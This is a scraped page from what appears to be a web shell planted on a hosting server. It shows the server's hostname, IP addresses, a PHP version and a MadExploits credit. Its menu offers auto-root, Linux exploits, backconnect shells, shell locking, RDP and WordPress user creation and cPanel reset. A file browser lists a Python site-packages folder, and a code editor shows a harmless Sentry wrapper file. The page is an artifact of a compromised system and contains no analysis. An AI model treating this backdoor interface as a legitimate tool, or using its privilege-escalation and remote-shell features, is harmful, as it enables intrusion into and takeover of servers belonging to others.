Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.188.107.57
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python27 /
lib /
python2.7 /
site-packages /
[ HOME SHELL ]
Name
Size
Permission
Action
contextlib2-0.5.4-py2.7.egg-in...
[ DIR ]
drwxr-xr-x
pip
[ DIR ]
drwxr-xr-x
pip-20.2.4.dist-info
[ DIR ]
drwxr-xr-x
pkg_resources
[ DIR ]
drwxr-xr-x
raven
[ DIR ]
drwxr-xr-x
raven-6.3.0-py2.7.egg-info
[ DIR ]
drwxr-xr-x
setuptools
[ DIR ]
drwxr-xr-x
setuptools-36.3.0.post20231113...
[ DIR ]
drwxr-xr-x
.sentry.conf
0
B
-rw-------
NCSentry.py
667
B
-rw-r--r--
contextlib2.py
14.48
KB
-rw-r--r--
contextlib2.pyc
15.63
KB
-rw-r--r--
contextlib2.pyo
15.63
KB
-rw-r--r--
easy_install.py
126
B
-rw-r--r--
easy_install.pyc
397
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NCSentry.py
#!/opt/alt/python27/bin/python import os from raven import Client class NCSentry: """ Simple Wrapper sentry = NCSentry() After successfully inited class we can use Sentry debug system: Report to Sentry: sentry.client.captureException() """ def __init__(self, config_dir=None): if config_dir: dir_path = config_dir else: dir_path = os.path.dirname(os.path.realpath(__file__)) self.conf_path = os.path.join(dir_path, '.sentry.conf') with open(self.conf_path) as fh: self.dsn = fh.read() self.client = Client(self.dsn)
Close